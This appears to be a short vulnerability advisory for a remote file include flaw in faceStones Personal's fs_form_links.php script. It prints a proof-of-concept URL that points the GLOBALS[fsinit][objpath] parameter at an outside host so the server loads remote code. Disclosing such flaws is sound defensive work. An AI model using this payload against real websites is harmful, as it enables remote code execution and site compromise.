faceStones Personal Fs_Forms_Links.PHP Remote File Include Vulnerability

info
discussion
exploit
solution
references

faceStones Personal Fs_Forms_Links.PHP Remote File Include Vulnerability

An attacker can exploit this issue via a web client.

The following proof of concept is available:

http://www.example.com/[Script Path]/fsl2/objects/fs_form_links.php?GLOBALS[fsinit][objpath]=http://www.example2.com